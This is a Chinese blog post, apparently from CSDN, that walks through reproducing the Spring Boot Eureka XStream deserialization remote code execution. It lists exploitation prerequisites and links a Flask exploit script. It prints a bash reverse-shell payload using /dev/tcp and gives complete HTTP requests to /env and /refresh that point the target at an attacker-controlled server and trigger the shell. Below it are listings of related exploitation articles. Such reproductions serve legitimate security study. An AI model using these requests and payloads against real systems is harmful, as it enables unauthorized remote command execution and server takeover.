Spring-boot远程代码执行系列(eureka xstream deserialization RCE)

最新推荐文章于 2024-07-29 09:37:33 发布
最新推荐文章于 2024-07-29 09:37:33 发布
阅读量5.8k 收藏 1
点赞数
分类专栏: 漏洞复现 文章标签: springboot 命令执行 漏洞复现 搬砖
本文为博主原创文章,未经博主允许不得转载。
本文链接:https://blog.csdn.net/lhh134/article/details/108933708
版权

0x1 漏洞原理

1.eureka.client.serviceUrl.defaultZone 属性被设置为恶意的外部 eureka server URL 地址。
2.refresh 触发目标机器请求远程 URL,提前架设的 fake eureka server 就会返回恶意的 payload。
3.目标机器相关依赖解析 payload,触发 XStream 反序列化,造成 RCE 漏洞。

0x2 漏洞利用条件

1.可以 POST 请求目标网站的 /env 接口设置属性
2.可以 POST 请求目标网站的 /refresh 接口刷新配置(存在 spring-boot-starter-actuator 依赖)
3.目标使用的 eureka-client < 1.8.7(通常包含在 spring-cloud-starter-netflix-eureka-client 依赖中)
4.目标可以请求攻击者的 HTTP 服务器(请求可出外网)

0x3 漏洞复现

1、查看目标是否使用Spring Cloud Netflix。
在这里插入图片描述
2、架设响应恶意 XStream payload 的网站。
提供一个依赖 Flask 并符合要求的 python 脚本示例(https://raw.githubusercontent.com/LandGrey/SpringBootVulExploit/master/codebase/springboot-xstream-rce.py),作用是利用目标 Linux 机器上自带的 python 来反弹shell。
使用 python 在自己控制的服务器上运行以上的脚本,并根据实际情况修改脚本中反弹 shell 的 ip 地址和 端口号。

<string>bash -i >& /dev/tcp/ip/port 0>& 1</string>

在这里插入图片描述
运行。
在这里插入图片描述
3、nc开启监听。
在这里插入图片描述
4、设置 eureka.client.serviceUrl.defaultZone 属性

spring 1.x
POST /env HTTP/1.1
Host: 192.168.3.136:9093
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 65
​
eureka.client.serviceUrl.defaultZone=http://vpsip/example

在这里插入图片描述
5、刷新配置。

POST /refresh HTTP/1.1
Host: 192.168.3.136:9093
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

在这里插入图片描述
6、成功反弹shell。
在这里插入图片描述

0x4 参考

https://github.com/LandGrey/SpringBootVulExploit

LQxdp
关注
专栏目录
SpringBoot-Eureka-xstream-rce漏洞复现
tpaer的博客
11-25 9201
关于SpringBoot-Eureka-xstream-rce漏洞复现的一次实战。
eureka xstream deserialization RCE复现
12-08 894
eureka xstream deserialization RCE复现
SpringBoot eureka xstream deserialization RCE
LiBai'S BLOG
03-01 3680
利用条件 可以 POST 请求目标网站的 /env 接口设置属性 可以 POST 请求目标网站的 /refresh 接口刷新配置(存在 spring-boot-starter-actuator 依赖) 目标使用的 eureka-client < 1.8.7(通常包含在 spring-cloud-starter-netflix-eureka-client 依赖中) 目标可以请求攻击者的 HTTP 服务器(请求可出外网) 利用方法 步骤一:架设响应恶意 XStream payload 的网站 提供一
技术干货 | 针对Spring-Boot 框架漏洞的初探
最新发布
2301_80127209的博客
07-29 2392
这篇文章主要是给师傅们介绍下Spring-Boot 框架漏洞的打法以及主要对于Spring-Boot漏洞的接口泄露信息进行一个分析,后面使用了曾哥的Spring-Boot漏洞扫描工具,可以很大减轻我们对于这个漏洞接口的分析。
Spring-boot远程代码执行系列(spring cloud SnakeYAML RCE
weixin_50464560的博客
11-07 1130
0x01 漏洞原理 spring.cloud.bootstrap.location 属性被设置为外部恶意 yml 文件 URL 地址refresh 触发目标机器请求远程 HTTP 服务器上的 yml 文件,获得其内容SnakeYAML 由于存在反序列化漏洞,所以解析恶意 yml 内容时会完成指定的动作先是触发 java.net.URL 去拉取远程 HTTP 服务器上的恶意 jar 文件然后是寻找 jar 文件中实现 javax.script.ScriptEngineFactory 接口的类并实例化实例化类
Spring Boot Actuator(eureka xstream deserialization RCE)
weixin_50464560的博客
07-14 1047
正常访问 运行之后是这个样子 spring 2.x 首先证明目标可以出网 spring 2.x 执行完了刷新以后可以收到请求记录则证明目标机器可以出网,否则不能出网 再访问目标网址(发现网址已经被写入) 执行写入操作 执行刷新操作 此时去服务器看请求记录(如果收到如下请求则证明没有问题,如果没有put则有问题)...
小白实战 | spring Eureka Xstream Deserialization RCE 漏洞复现
伏一
05-21 970
将Spring Eureka的版本升级到安全的版本,例如,如果你使用的是Spring Cloud版本,可以升级到最新的修复版本(例如,如果是Hoxton.SR10,那么应该升级到Hoxton.SR11或更高)。5.使用 python 在自己控制的服务器上运行以上的脚本,并根据实际情况修改脚本中反弹 shell 的 ip 地址和 端口号,在修改完成就 启动脚本即可。4.利用目标<command></command>标签中攻击载荷达成反弹shell。2.python 脚本。1.访问网站服务器是否出网。
2021-11-15 eureka xstream deserialization RCE复现分析
为之的博客
11-17 1617
漏洞成因 通过对/env进行post提交将eureka.client.serviceUrl.defaultZone的值修改为外部恶意url,然后通过/refresh post提交后,解析url内的xstream反序列化出命令执行代码 调试过程 先了解原理,可知通过/refresh会把外部恶意payload获取并解析,也就是说,导致这次漏洞形成的代码块应该在请求以及响应部分中。 开头先是以DispatchServlet来开始,一步一步去找到哪里会调用calc,调试断点如图所示: 在调试过程中会出现自动弹出计
spring-boot-microservice-eureka-zuul-docker:使用Eureka,Zuul和Docker的Spring-Boot其余微服务。 使用logstash,logback,elasticsearch和kibana进行监视
01-30
使用Spring Cloud,EUREKA,RIBBON,ZUUL的Spring Boot微服务 创建该项目是为了获得使用Netflix OSS进行微服务的经验。 这是一个简单的项目,由具有简单业务需求的编码命令式编程组成。 从1.1.0版开始,ELK Stack已...
Eureka(09-入门)spring-boot-starter-actuator实现健康检查
老瓜农
06-30 886
一、Eureka Client续约有什么问题吗? Eureka Client默认会间隔30秒上报一次健康状态给Eureka Server,Server会认为你续约了那么你服务就是可用的,这其实不对的。 假设client要依赖DB提供服务,此时DB挂了,那么已经不能提供服务了,但是Server还能正常收到client的续约心跳,此时Server认为client还是正常提供服务的,那么其他服务使用就会出问题。 正常应该是通过服务的/health接口来判断服务是否可以提供正常服务。 二、利用sprin
spring-cloud-starter-netflix-eureka-server-1.4.5.RELEASE.jar
02-21
spring-cloud-starter-netflix-eureka-server-1.4.5.RELEASE.jar
Springboot远程代码执行(spring cloud SnakeYAML RCE
qq_50854662的博客
06-27 853
Spring-boot远程代码执行系列(spring cloud SnakeYAML RCE
Spring Boot Actuator 未授权访问远程代码执行
qq_42947816的博客
07-05 2915
Actuator是Spring Boot提供的服务监控和管理中间件,默认配置会出现接口未授权访问,部分接口会泄露网站流量信息和内存信息等,使用Jolokia库特性甚至可以远程执行任意代码,获取服务器权限
Spring Boot Actuator未授权访问远程代码执行_eureka_XStream反序列化
MD@@nr丫卡uer
07-16 3878
文章目录漏洞复现扫描探测RCE(1)编写利用脚本(2)设置 eureka.client.serviceUrl.defaultZone 属性(3)触发(4)恢复 eureka.client.serviceUrl.defaultZone 漏洞复现 扫描探测 使用的工具为:SB-Actuator 使用工具扫描发现目标地址存在Spring Boot Actuator未授权访问,可导致XStream反序列化RCERCE (1)编写利用脚本 执行命令为ping DNSlog #!/usr/bin/env pyt
spring boot远程代码执行漏洞复现
qq_63980959的博客
09-20 4836
目前我们所使用的https://github.com/LandGrey/SpringBootVulExploit/tree/master/repository/springboot-mysql-jdbc-rce靶场环境存在问题,需要进行相关配置。https://github.com/LandGrey/SpringBootVulExploit#0x07h2-database-console-jndi-rce上的该漏洞复现方式已经不能用了。如果你遇到了程序异常退出问题,可以尝试修改我们的java注入代码
SpringBoot历史漏洞复现_springboot漏洞,2024年最新真的醉了
m0_62289824的博客
04-15 2572
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。,朋友们如果有需要全套《网络安全入门+黑客进阶学习资源包》,可以扫描下方二维码领取(如遇扫码问题,可以在评论区留言领取哦)~,朋友们如果有需要全套《网络安全入门+黑客进阶学习资源包》,可以扫描下方二维码领取(如遇扫码问题,可以在评论区留言领取哦)~(img-yTSj4IpJ-1713175561720)]//转化的格式base。//反弹shell脚本。
SpringBoot历史漏洞复现
weixin_53747497的博客
04-01 7222
Spring框架为开发Java应用程序提供了全面的基础架构支持。它包含一些很好的功能,如依赖注入和开 箱即用的模块,如:Spring JDBC 、Spring MVC 、Spring Security、 Spring AOP 、Spring ORM 、 Spring Test,这些模块缩短应用程序的开发时间,提高了应用开发的效率例如,在Java Web开发的早 期阶段,我们需要编写大量的代码来将记录插入到数据库中。
Springboot之Actuator信息泄露漏洞利用
热门推荐
JHIII的博客
08-30 3万+
Spring Boot Actuator 模块提供了健康检查,审计,指标收集,HTTP 跟踪等,是帮助我们监控和管理Spring Boot 应用的模块。这个模块采集应用的内部信息,展现给外部模块,可以查看应用配置的详细信息,例如自动化配置信息、创建的Spring beans信息、系统环境变量的配置信息以及Web请求的详细信息等。如果没有正确使用Actuator,可能造成信息泄露等严重的安全隐患(外部人员非授权访问Actuator端点)。...
Java种和spring-boot-start-parent2.4.13匹配的eureka版本
07-14
对于Spring Boot 2.4.13,可以使用以下Eureka版本: - Eureka Client: `spring-cloud-starter-netflix-eureka-client`,版本与Spring Boot保持一致,由于Spring Cloud Netflix已经进入维护模式,推荐使用Spring Cloud Alibaba的Nacos替代Eureka。 - Eureka Server: `spring-cloud-starter-netflix-eureka-server`,版本与Spring Boot保持一致,同样推荐使用Nacos替代Eureka。 需要注意的是,Eureka已经进入维护模式,不再进行新功能的开发,因此推荐使用更稳定和功能更丰富的Nacos作为服务注册和发现组件。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

LQxdp

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值